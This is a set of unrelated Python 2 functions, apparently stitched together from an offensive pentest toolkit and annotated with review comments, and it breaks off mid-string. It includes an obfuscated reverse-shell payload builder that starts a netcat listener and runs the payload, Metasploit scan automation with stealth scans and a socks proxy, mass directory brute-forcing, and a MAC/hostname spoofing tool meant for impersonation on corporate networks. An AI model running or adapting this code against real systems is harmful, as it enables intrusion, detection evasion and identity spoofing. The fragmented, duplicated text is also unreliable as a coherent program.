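def main():
    """Interactive Armitage teamserver menu: prompt for a command and dispatch it.

    Prompts repeatedly until ``EXIT`` is entered.  ``LAUNCH`` and ``LOAD``
    call the module-level helpers ``collect_teamserver_creds`` /
    ``load_saved_teamserver_creds`` with the module-level ``save_file``;
    any other entry prints an error and re-prompts.  Relies on the
    module-level ``toolkits`` colour helpers and Python 2 ``raw_input``.
    Never returns normally: ``EXIT`` leaves via ``exit(0)``.
    """
    # A loop replaces the original pattern of calling main() again after every
    # choice: that recursion added one stack frame per LAUNCH/LOAD/invalid
    # entry and would hit the interpreter recursion limit on a long session.
    while True:
        print(toolkits.cyan("""
    \n\n\n
    \t\tForeplay, EZ-Mode Armitage Teamserver Collaboration Menu
    \n\t\t\t\tCOMMANDS\n
    LAUNCH - Launch the Armitage Teamserver using NEW CREDENTIALS
    LOAD - Load PREVIOUSLY SAVED CREDENTIALS and launch a teamserver from that
    EXIT - Exit program
    """))

        # raw_input already returns a str in Python 2; no str() wrapper needed.
        # Matching is exact and case-sensitive, as in the original.
        opt_choice = raw_input(toolkits.yellow("Enter a COMMAND: "))

        if opt_choice == "LAUNCH":
            collect_teamserver_creds(save_file)
        elif opt_choice == "LOAD":
            load_saved_teamserver_creds(save_file)
        elif opt_choice == "EXIT":
            print(toolkits.red('Received exit command, exiting!'))
            exit(0)
        else:
            print(toolkits.red(
                'You have entered a invalid option, please try again'))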
def main():
    """Build an encrypted payload file from a template, write it, then run it.

    Linear sequence of side effects (file writes, stdout, two ``os.system``
    calls); nothing is returned.  Every helper used here (``generateKey``,
    ``generateIV``, ``read_template``, ``commandSegmentationTech``,
    ``cryptor``, ``writeUniquePayload``, the colour functions, ``b64encode``,
    ``LPORT``, ``template_reverse_shell``) comes from module scope.
    """
    # Key and IV are produced by module-level helpers; their format is not
    # visible here — presumably raw bytes accepted by cryptor(), verify.
    decryptKey = generateKey()
    decryptIV = generateIV()
    code = read_template()
    # Bare name expression: evaluates template_reverse_shell and discards the
    # result. It has no effect other than raising NameError if the name is
    # undefined — looks like a leftover line.
    template_reverse_shell

    # template_reverse_shell is used as a str here (splitlines), so it is
    # presumably a module-level string constant.
    payloadNoEncrypt = template_reverse_shell.splitlines()
    shuffledPayload = commandSegmentationTech(payloadNoEncrypt)
    # writableLines = convertIntoLines(shuffledPayload)
    l_encrypted = cryptor(shuffledPayload, decryptKey, decryptIV)
    # writeUniquePayload returns the path of the generated file (used below
    # as a filename and in the os.system command).
    outfile = writeUniquePayload(code, l_encrypted, decryptKey, decryptIV)
    print red("DEBUG: Shuffled payload\r\n{}".format(str(shuffledPayload)))
    out = b64encode(l_encrypted)
    print yellow("DEBUG: Encrypted payload\r\n{}".format(str(out)))
    print green("DEBUG: Payload generated at\r\n{}".format(str(outfile)))
    # NOTE(review): the handle is never closed (no close()/with); it leaks
    # until the interpreter exits. 'rb+' is also wider than needed for a read.
    rp = open(outfile, 'rb+')
    uniquePayload = rp.read()
    print red("DEBUG: Contents of {}\r\n".format(str(outfile)))
    print yellow(uniquePayload)
    print cyan("Opening netcat session")
    # Shell command string assembled by str.format; LPORT is interpolated
    # unquoted into a nested bash -c invocation.
    os.system("""gnome-terminal -e 'bash -c "nc -nvlp {}"'""".format(
        str(LPORT)))
    print green("You may run the payload with\r\npython {}".format(
        str(outfile)))
    # Fixed 2 s pause before execution; presumably to let the terminal above
    # come up first — no synchronisation is done.
    time.sleep(2)
    print green("Executing payload")
    # outfile is interpolated unquoted into a shell string as well; a path
    # containing spaces or shell metacharacters would not be passed intact.
    os.system("python {}".format(str(outfile)))
    return
def main():
    """Entry point: print the banner, check argv, hand the input file to readInputFile.

    Prints usage and exits with status 0 when no positional argument was
    given.  Only ``sys.argv[1]`` is consumed here; the other arguments
    listed in the usage text are presumably handled elsewhere — confirm.
    Uses module-level ``sys``, ``toolkits`` and ``readInputFile``.
    """
    print("MassGoBuster. Automatically run gobuster against a wordlist of host,port.\r\nComing soon: Threading by running 5 gobuster processes at a time.")

    # Guard clause: no input file given -> usage text, then exit.
    if len(sys.argv) < 2:
        usage = toolkits.yellow(
            "Usage:\r\npython massgobuster.py <wordlist of host,ports> <wordlist of paths> <OPTIONAL: threads, default=10>"
        )
        example = toolkits.cyan(
            "\r\nEXAMPLE: python massGoBuster.py targetHostPort.txt /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt 50\r\nEXAMPLE EFFECT: Runs GoBuster at a rate of 50 threads against each target,port combo found in the list of targets using the wordlist"
        )
        print(usage)
        print(example)
        exit(0)

    readInputFile(sys.argv[1])
def cyan(string):
    """Colour ``string`` via toolkits.cyan, echo it to stdout, and return the coloured text.

    Note that this wrapper both prints and returns: callers that print the
    return value again will show the text twice.
    """
    colored = toolkits.cyan(string)
    print(colored)
    return colored
def initial_scan(target_list):
    """Prepare and launch the initial Metasploit/db_nmap scans for a target list.

    Prompts for a Metasploit workspace name, restarts tor, builds three
    db_nmap command strings (FIN, XMAS, comprehensive), writes them into a
    resource file at a fixed path under /tmp, then hands the assembled
    msfconsole command to ``MSF_cmd_exec``.

    Args:
        target_list: path to a file of targets, passed to nmap via ``-iL``.

    Returns:
        ``(MSF_cmd, resource_file_default)``: the msfconsole command string
        and the resource file path.

    Uses module-level ``toolkits``, ``os``, ``time``, ``bash_command`` and
    ``MSF_cmd_exec``; relies on Python 2 ``raw_input``.
    """
    # Fixed, predictable path in a shared directory; overwritten on every run.
    resource_file_default = '/tmp/resource_file_default.rc'
    print toolkits.cyan("Your selected target list file is {0}".format(
        str(target_list)))
    workspace = str(raw_input("Enter your Metasploit WORKSPACE: "))

    # NOTE(review): `or None` is always falsy, so this condition is just
    # `workspace == ""`. An entry of only whitespace is NOT mapped to "default".
    if workspace == "" or None:
        workspace = "default"
    else:
        pass
    # restarts tor

    # Runs via the shell; needs privileges to restart the service.
    TOR_restart_cmd = "service tor restart"
    os.system(TOR_restart_cmd)
    save_file_location = "/root/Documents"  # default nmap xml saved files location

    # asks user for a list of targets he wants to scan as a simple text file with one IP address or hostname per line

    # these are all of the enumeration scripts
    enum_scripts = """ajp-headers.nse,http-headers.nse,http-security-headers.nse,http-server-header.nse,cics-enum.nse,cics-user-enum.nse,citrix-enum-apps.nse,citrix-enum-apps-xml.nse,citrix-enum-servers.nse,citrix-enum-servers-xml.nse,dns-nsec3-enum.nse,dns-nsec-enum.nse,dns-srv-enum.nse,domino-enum-users.nse,eppc-enum-processes.nse,http-domino-enum-passwords.nse,http-drupal-enum.nse,http-drupal-enum-users.nse,http-enum.nse,http-gitweb-projects-enum.nse,http-svn-enum.nse,http-userdir-enum.nse,http-wordpress-enum.nse,krb5-enum-users.nse,msrpc-enum.nse,mysql-enum.nse,ncp-enum-users.nse,nrpe-enum.nse,omp2-enum-targets.nse,oracle-enum-users.nse,rdp-enum-encryption.nse,sip-enum-users.nse,smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-mbenum.nse,smtp-enum-users.nse,ssh2-enum-algos.nse,ssl-enum-ciphers.nse,tftp-enum.nse,tso-enum.nse,vtam-enum.nse"""

    # generates random time str to make the .xml file unique
    # (the doubled `timestr = timestr =` is a harmless chained assignment;
    # the value is a timestamp, not random, so two runs in the same second
    # would reuse the same .xml names)
    timestr = timestr = time.strftime("%Y%m%d-%H%M%S")

    # runs scans in this order, FIN, XMAS, and COMPREHENSIVE

    # the problem is that

    # we cannot multiplex additional commands into msf console with the -x option
    # the resource file option is slow as f**k.
    # Placeholders: {0} enum_scripts, {1} target_list, {2} save_file_location,
    # {3} timestr. Same layout for the two commands below.
    FIN_scan_cmd = """db_nmap -v -O -sF -Pn -T4 -O -F -oX {2}/FIN_initial_scan_{3}.xml --script={0} nmap --min-hostgroup 50 --max-hostgroup 1024 --min-parallelism 10 --max-parallelism 20 --host-timeout 30s -iL {1}""".format(
        str(enum_scripts), str(target_list), str(save_file_location),
        str(timestr))

    #timestr = timestr = time.strftime("%Y%m%d-%H%M%S")

    XMAS_scan_cmd = """db_nmap -v -O -sX -Pn -T4 -O -F -oX {2}/XMAS_initial_scan_{3}.xml --script={0} nmap --min-hostgroup 50 --max-hostgroup 1024 --min-parallelism 10 --max-parallelism 20 --host-timeout 30s -iL {1}""".format(
        str(enum_scripts), str(target_list), str(save_file_location),
        str(timestr))

    #timestr = timestr = time.strftime("%Y%m%d-%H%M%S")

    COMPRE_scan_cmd = """db_nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 -oX {2}/COMPRE_initial_scan_{3}.xml --script={0} nmap --min-hostgroup 50 --max-hostgroup 1024 --min-parallelism 10 --max-parallelism 20 --host-timeout 30s -iL {1}""".format(
        str(enum_scripts), str(target_list), str(save_file_location),
        str(timestr))

    # runs all of these commands immediately after metasploit starts up.
    # The user-supplied workspace name is interpolated unescaped into this
    # semicolon-separated command string. FIN_scan_cmd is placed here AND in
    # the resource file below, so it would be issued twice if both are run
    # as written — verify that is intended.
    MSF_cmd = "workspace -a {0};setg WORKSPACE {0};{2};resource {1}".format(
        str(workspace), str(resource_file_default), str(FIN_scan_cmd))

    # .format is applied to the result of toolkits.yellow(), i.e. after
    # colouring; this only works if yellow() returns a str.
    print toolkits.yellow("""
        DEBUG: db_nmap lines
        {0}

    """).format(str(MSF_cmd))

    time.sleep(3)
    # Resource file body: starts the socks4a proxy module as a job, then the
    # three db_nmap scans in FIN, XMAS, comprehensive order.
    db_nmap_resource_file = """
    use auxiliary/server/socks4a
    run -j
    {0}
    {1}
    {2}
    """.format(str(FIN_scan_cmd), str(XMAS_scan_cmd), str(COMPRE_scan_cmd))
    print toolkits.yellow("""
    DEBUG: Resource file content
    {0}
    """).format(str(db_nmap_resource_file))
    # Written in text mode and closed explicitly (no `with`, so an exception
    # in write() would leave the handle open).
    w = open(resource_file_default, 'w')
    w.write(db_nmap_resource_file)
    w.close()
    print toolkits.yellow("""
    DEBUG: Location of resource files

    {0}
    """).format(str(resource_file_default))

    # Debug listing of the written file through the module-level bash_command.
    debug_str = """ls -la {0}""".format(str(resource_file_default))
    bash_command(debug_str)

    # host_cidr_range is always empty and darkoperator_resource_file is built
    # but never used or written anywhere in this function (dead code).
    host_cidr_range = ''
    darkoperator_resource_file = """
    workspace {0}
    load pentest
    network_discovery -d -v -r {1}
    """.format(str(workspace), str(host_cidr_range))

    # Presumably runs msfconsole with MSF_cmd (-x, per the comment above) —
    # MSF_cmd_exec is defined elsewhere; confirm.
    MSF_cmd_exec(MSF_cmd)

    return MSF_cmd, resource_file_default
# Module-level banner text; printed once at import time (see below).
banner = """
    Macchanger Improved
    A needed makeover for a reknowned pentest tool

    'Automatically selects the CLOSEST non-conflicting MAC address by randomizing the last portion of the MAC'
    'Farms new real hostnames and MAC address ranges'
    'Swaps your hostname independently, allowing you to assume other identities or blend into corporate network routers and WDS systems, like UNLV-Secure, UNLV-Guest, or IGT-Gaming'

    Chang Tan
    Lister Unlimited Cybersecurity Solutions, LLC.
    [email protected]
    Macchanger Improved is Part of the Hyperjacker's Toolkit
    Open-Source Penetration Testing Toolkits are NOT AVAILABLE FOR RESALE.
"""

# Import-time side effect: the local cyan() wrapper prints the banner itself
# and returns it, so this print statement outputs the banner a second time.
print cyan(banner)


def main():

    menu = """Exit
    Farm new MAC addresses to impersonate
    Wi-Fi Hostname Farmer, Farm new Hostnames (Computer ID's) to impersonate
    Activate Switch Identity + MAC address
    View impersonatable names
    View impersonatable MAC addresses
    LAN Hostname Farmer, Farm locally connected Hostnames using NetDiscover"""

    print """
        (run python install.py)
        INSTALL. Install both the Python and Debian/Kali APT Prerequisites